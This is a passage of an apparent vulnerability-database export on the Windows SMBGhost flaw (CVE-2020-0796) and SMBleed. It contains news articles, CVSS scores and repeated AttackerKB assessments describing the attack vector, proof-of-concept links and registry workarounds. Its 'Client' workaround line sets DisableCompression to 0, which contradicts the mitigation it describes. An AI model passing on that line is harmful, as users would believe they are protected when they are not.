compression headers, making it possible for unauthenticated remote attackers to execute malicious code on target servers or clients with SYSTEM privileges. \n \nCompression headers is a feature that was added to the affected protocol of Windows 10 and Windows Server operating systems in May 2019, designed to compress the size of messages exchanged between a sever and clients connected to it. \n \n\n\n \n\"To exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it,\" Microsoft said in the [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>). \n \nAt the time of writing, there is only one known [PoC exploit](<https://twitter.com/kryptoslogic/status/1238057276738592768>) that exists for this critical remotely exploitable flaw, but reverse engineering new patches could now also help hackers find possible attack vectors to develop fully weaponized self-propagating malware. \n \nA separate team of researchers have also published a [detailed technical analysis](<https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html>) of the vulnerability, concluding a kernel pool overflow as the root cause of the issue. \n \nAs of today, there are nearly [48,000 Windows systems](<https://twitter.com/kryptoslogic/status/1238069159919063050>) vulnerable to the latest SMB compression vulnerability and accessible over the Internet. \n \nSince a patch for the wormable SMBv3 flaw is now available to download for affected versions of Windows, it's highly recommended for home users and businesses to install updates as soon as possible, rather than merely relying on the mitigation. \n \nIn cases where immediate patch update is not applicable, it's advised to at least disable SMB compression feature and block SMB port for both inbound and outbound connections to help prevent remote exploitation. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T14:30:00", "type": "thn", "title": "Critical Patch Released for 'Wormable' SMBv3 Vulnerability \u2014 Install It ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T19:09:39", "id": "THN:90048C5D2E69F2E769EE053B3E1555AA", "href": "https://thehackernews.com/2020/03/patch-wormable-smb-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:34", "description": "[![windows smbv3 wormable vulnerability](https://thehackernews.com/images/-XWqJWgCIL68/XmjWkC736wI/AAAAAAAAAEk/kCxnmKI_8FwVk2x8eaIUoMZR9IrJ6zuLACLcBGAsYHQ/s728-e100/windows-smbv3-wormable-vulnerability.jpg)](<https://thehackernews.com/images/-XWqJWgCIL68/XmjWkC736wI/AAAAAAAAAEk/kCxnmKI_8FwVk2x8eaIUoMZR9IrJ6zuLACLcBGAsYHQ/s728-e100/windows-smbv3-wormable-vulnerability.jpg>)\n\nShortly after releasing its [monthly batch of security updates](<https://thehackernews.com/2020/03/microsoft-patch-tuesday-march-2020.html>), Microsoft late yesterday separately issued an [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) warning billions of its Windows users of a new critical, unpatched, and wormable vulnerability affecting **Server Message Block 3.0** (**SMBv3**) network communication protocol. \n \nIt appears Microsoft originally planned to fix the flaw as part of its March 2020 Patch Tuesday update only, but, for some reason, it pulled the plug at the last minute, which apparently did not stop a tech company from accidentally leaking the existence of the unpatched flaw. \n \nThe yet-to-be patched flaw (tracked as** CVE-2020-0796**), if exploited successfully, could allow an attacker to [execute arbitrary code](<https://kb.cert.org/vuls/id/872016/>) on the target SMB Server or SMB Client. \n \nThe belated acknowledgment from Microsoft led some researchers to call the bug \"[SMBGhost](<https://twitter.com/malwrhunterteam/status/1237480108568477697>).\" \n \n\"To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server,\" Microsoft disclosed in an advisory. \"To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\" \n \nServer Message Block protocol provides the basis for file sharing, network browsing, printing services, and interprocess communication over a network. \n \n\n\n[![cisco smb flaw](https://thehackernews.com/images/-UcalHqQSaG0/XmjSmLBS_-I/AAAAAAAAAEY/S1FgtNQsCasVW03_xelhob0EUutLV6c1QCLcBGAsYHQ/s728-e100/cisco-smb-flaw.jpg)](<https://thehackernews.com/images/-UcalHqQSaG0/XmjSmLBS_-I/AAAAAAAAAEY/S1FgtNQsCasVW03_xelhob0EUutLV6c1QCLcBGAsYHQ/s728-e100/cisco-smb-flaw.jpg>)\n\n \nAccording to a now-removed Cisco Talos post, the flaw opens vulnerable systems to a \"wormable\" attack, making it easy to propagate from one victim to the other. \n \nAlthough it's unclear when Microsoft plans to patch the flaw, the company is urging users to disable SMBv3 compression and block TCP port 445 on firewalls and client computers as a workaround. \n \nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force \n \nFurthermore, Microsoft has cautioned that disabling SMBv3 compression will not prevent the exploitation of SMB clients. \n \nIt's worth pointing out that the flaw impacts only Windows 10 version 1903, Windows 10 version 1909, Windows Server version 1903, and Windows Server version 1909. But it's possible more versions are affected as SMB 3.0 was introduced with Windows 8 and Windows Server 2012. \n \nDespite the severity of the SMB bug, there's no evidence that it's being exploited in the wild. But it's also necessary to draw attention to the fact that this is far from the only time SMB has been exploited as an attack vector for intrusion attempts. \n \nIn the past few years alone, some of the major ransomware infections, including [WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) and [NotPetya](<https://thehackernews.com/2017/06/petya-ransomware-attack.html>), have been the consequence of SMB-based exploits. \n \nFor now, until Microsoft releases a security update designed to patch the CVE-2020-0796 RCE flaw, it's recommended that the system administrators implement the workarounds to block attacks attempting to exploit the vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T12:16:00", "type": "thn", "title": "Warning \u2014 Unpatched Critical 'Wormable' Windows SMBv3 Flaw Disclosed", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-11T12:27:42", "id": "THN:F1DFBF3E8E6E5F3CD1282E08B3C3E35D", "href": "https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:18", "description": "[![](https://thehackernews.com/images/-31RfzSS3xQM/Xt-9Ggf-iMI/AAAAAAAAAbo/CAzBcgrMaUkcozaX_3-vN2Kqw-vCruNKwCLcBGAsYHQ/s728-e100/SMBleed-smb-vulnerability.jpg)](<https://thehackernews.com/images/-31RfzSS3xQM/Xt-9Ggf-iMI/AAAAAAAAAbo/CAzBcgrMaUkcozaX_3-vN2Kqw-vCruNKwCLcBGAsYHQ/s728-e100/SMBleed-smb-vulnerability.jpg>)\n\nCybersecurity researchers today uncovered a new critical vulnerability affecting the Server Message Block (SMB) protocol that could allow attackers to leak kernel memory remotely, and when combined with a previously disclosed \"wormable\" bug, the flaw can be exploited to achieve remote code execution attacks. \n \nDubbed \"**SMBleed**\" ([CVE-2020-1206](<https://blog.zecops.com/vulnerabilities/smbleed-writeup-cve-2020-1206-chaining-smbleed-with-smbghost-for-a-rce/>)) by cybersecurity firm ZecOps, the flaw resides in SMB's decompression function \u2014 the same function as with [SMBGhost](<https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html>) or EternalDarkness bug ([CVE-2020-0796](<https://nvd.nist.gov/vuln/detail/CVE-2020-0796>)), which came to light three months ago, potentially opening vulnerable Windows systems to malware attacks that can propagate across networks. \n \nThe newly discovered vulnerability impacts Windows 10 versions 1903 and 1909, for which Microsoft today released security patches as part of its monthly [Patch Tuesday updates for June](<https://thehackernews.com/2020/06/windows-update-june.html>). \n \nThe development comes as the US Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory last week warning Windows 10 users to update their machines after exploit code for SMBGhost bug was published online last week. \n \nSMBGhost was deemed so serious that it received a maximum severity rating score of 10. \n \n\n\n[![SMBleed vulnerability](https://thehackernews.com/images/-HXrk2t3JHZo/Xt_WMvC_GjI/AAAAAAAA24g/XI7OAmusTswUO4fRatFn1viazIJt1A3YQCLcBGAsYHQ/s728-e100/SMBleed-smb-vulnerability.gif)](<https://thehackernews.com/images/-HXrk2t3JHZo/Xt_WMvC_GjI/AAAAAAAA24g/XI7OAmusTswUO4fRatFn1viazIJt1A3YQCLcBGAsYHQ/s728-e100/SMBleed-smb-vulnerability.gif>)\n\n \n\"Although Microsoft disclosed and provided [updates for this vulnerability](<https://thehackernews.com/2020/03/patch-wormable-smb-vulnerability.html>) in March 2020, malicious cyber actors are targeting unpatched systems with the [new PoC](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>), according to recent open-source reports,\" [CISA said](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>). \n \nSMB, which runs over TCP port 445, is a network protocol that provides the basis for file sharing, network browsing, printing services, and interprocess communication over a network. \n \nAccording to ZecOps researchers, the flaw stems from the way the decompression function in question (\"[Srv2DecompressData](<https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/>)\") handles specially crafted message requests (e.g., [SMB2 WRITE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e7046961-3318-4350-be2a-a8d69bb59ce8>)) sent to a targeted SMBv3 Server, allowing an attacker to read uninitialized kernel memory and make modifications to the compression function. \n \n\"The message structure contains fields such as the amount of bytes to write and flags, followed by a variable-length buffer,\" the researchers said. \"That's perfect for exploiting the bug since we can craft a message such that we specify the header, but the variable-length buffer contains uninitialized data.\" \n \n\"An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. To exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\" Microsoft said in its advisory. \n \n\"To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it,\" Microsoft added. \n \n\n\n[![smbleed](https://thehackernews.com/images/-5r2cFQ5tcxU/Xt-7b9jI5lI/AAAAAAAAAbc/Lz27jkr0HmYimZJMXmSbvSt2mUc4GI6qQCLcBGAsYHQ/s728-e100/smbleed.jpg)](<https://thehackernews.com/images/-5r2cFQ5tcxU/Xt-7b9jI5lI/AAAAAAAAAbc/Lz27jkr0HmYimZJMXmSbvSt2mUc4GI6qQCLcBGAsYHQ/s728-e100/smbleed.jpg>)\n\n \nWorse, SMBleed can be chained with SMBGhost on unpatched Windows 10 systems to achieve remote code execution. The firm has also released a proof-of-concept [exploit code demonstrating](<https://github.com/ZecOps/CVE-2020-1206-POC>) the [flaws](<https://github.com/ZecOps/CVE-2020-0796-RCE-POC>). \n \n\n\n[![windows security](https://thehackernews.com/images/-Jn6fEt5YpZ0/Xt_6MEANjOI/AAAAAAAA24s/zLjx-XBqNLYnjfayGiHXEKJko4si4eOqQCLcBGAsYHQ/s728-e100/windows-security.jpg)](<https://thehackernews.com/images/-Jn6fEt5YpZ0/Xt_6MEANjOI/AAAAAAAA24s/zLjx-XBqNLYnjfayGiHXEKJko4si4eOqQCLcBGAsYHQ/s728-e100/windows-security.jpg>)\n\n \nTo mitigate the vulnerability, it's recommended that home and business users install the latest Windows updates as soon as possible. \n \nFor systems where the patch is not applicable, it's advised to block port 445 to prevent lateral movement and remote exploitation. \n \nMicrosoft's security guidance addressing SMBleed and SMBGhost in Windows 10 version 1909 and 1903 and Server Core for the same versions can be [found here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and [here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-09T20:30:00", "type": "thn", "title": "SMBleed: A New Critical Vulnerability Affects Windows SMB Protocol", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206"], "modified": "2020-06-10T03:44:11", "id": "THN:17F11846886656062FA1EA84D1C74534", "href": "https://thehackernews.com/2020/06/SMBleed-smb-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:18", "description": "[![windows-update](https://thehackernews.com/images/-HLpQHeEvk6w/Xt_Q3_Z2PhI/AAAAAAAA24Y/ALzIuhTPzrEdlhe18apQb6AzpVQcp9qjQCLcBGAsYHQ/s728-e100/windows-update.jpg)](<https://thehackernews.com/images/-HLpQHeEvk6w/Xt_Q3_Z2PhI/AAAAAAAA24Y/ALzIuhTPzrEdlhe18apQb6AzpVQcp9qjQCLcBGAsYHQ/s728-e100/windows-update.jpg>)\n\nMicrosoft today released its June 2020 batch of software security updates that patches a total of 129 newly discovered vulnerabilities affecting various versions of Windows operating systems and related products. \n \nThis is the third Patch Tuesday update since the beginning of the global Covid-19 outbreak, putting some extra pressure on security teams struggling to keep up with patch management while proceeding with caution that should not break anything during this lockdown season. \n \nThe 129 bugs in the June 2020 bucket for sysadmins and billions of users include 11 critical vulnerabilities\u2014all leading to remote code execution attacks\u2014and 118 classified as important in severity, mostly leading to privilege escalation and spoofing attacks. \n \nAccording to the advisories Microsoft released today, hackers, fortunately, don't appear to be exploiting any of the zero-day vulnerabilities in the wild, and details for none of the flaws addressed this month was disclosed publicly before this publication. \n \nOne of the notable flaws is an information disclosure vulnerability ([CVE-2020-1206](<https://thehackernews.com/2020/06/SMBleed-smb-vulnerability.html>)) in Server Message Block 3.1.1 (SMBv3) protocol that, according to a team of researchers, can be exploited in combination with previously disclosed [SMBGhost (CVE-2020-0796)](<https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html>) flaw to archive remote code execution attacks. You can find more [details on this flaw](<https://thehackernews.com/2020/06/SMBleed-smb-vulnerability.html>) here. \n \nThree critical bugs (CVE-2020-1213, [CVE-2020-1216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1216>), and CVE-2020-1260) affect the VBScript engine and exist in the way it handles objects in memory, allowing an attacker to execute arbitrary code in the context of the current user. \n \nMicrosoft has listed these flaws as \"Exploitation more likely,\" explaining that it has seen attackers consistently exploiting similar flaws in the past, and can be carried out remotely via browser, application or Microsoft Office document that hosts the IE rendering engine. \n \nOne of the 11 critical issues exploits a vulnerability ([CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>)) in the way Windows handles Shortcut files (.LNK), allowing attackers to execute arbitrary code on the targeted systems remotely. Like all previous LNK vulnerabilities, this type of attack could also lead to victims losing control over their computers or having their sensitive data stolen. \n \nThe GDI+ component that enables programs to use graphics and formatted text on a video display or printer in Windows has also been found vulnerable to a remote code execution flaw (CVE-2020-1248). \n \nAccording to Microsoft, GDI+ RCE vulnerability can be exploited in combination with a separate critical security feature bypass vulnerability ([CVE-2020-1229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1229>)) affecting Microsoft Outlook software that could let attackers automatically load malicious images hosted on a remote server. \n \n\"In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted image to the user. An attacker who successfully exploited this vulnerability could cause a system to load remote images. These images could disclose the IP address of the targeted system to the attacker,\" the advisory says. \n \nBesides these, the June 2020 update also includes a patch for a new critical remote code execution flaw ([CVE-2020-9633](<https://helpx.adobe.com/security/products/flash-player/apsb20-30.html>)) affecting Adobe Flash Player for Windows systems. \n \nIt's recommended that all users apply the latest security patches as soon as possible to prevent malware or miscreants from exploiting them to gain remote control over vulnerable computers. \n \nFor installing the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or by selecting Check for Windows updates. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-09T18:14:00", "type": "thn", "title": "Microsoft Releases June 2020 Security Patches For 129 Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206", "CVE-2020-1213", "CVE-2020-1216", "CVE-2020-1229", "CVE-2020-1248", "CVE-2020-1260", "CVE-2020-1299", "CVE-2020-9633"], "modified": "2020-06-10T17:48:33", "id": "THN:882595A940E5AB15E8B9C472154ACA45", "href": "https://thehackernews.com/2020/06/windows-update-june.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-03-29T18:03:54", "description": "This indicates an attack attempt to exploit a Buffer Overflow Vulnerability in Microsoft SMB Servers. \nThe vulnerability is due to an error when the vulnerable software handles a maliciously crafted compressed data packet. A remote, unauthenticated attacker can exploit this to execute arbitrary code within the context of the application.\n\n \n**Recent assessments:** \n \n**jorgeorchilles** at March 11, 2020 1:19pm UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\n**zeroSteiner** at April 15, 2020 4:10pm UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\n**FULLSHADE** at April 21, 2020 3:50am UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\n**brettsec** at March 10, 2020 9:16pm UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: 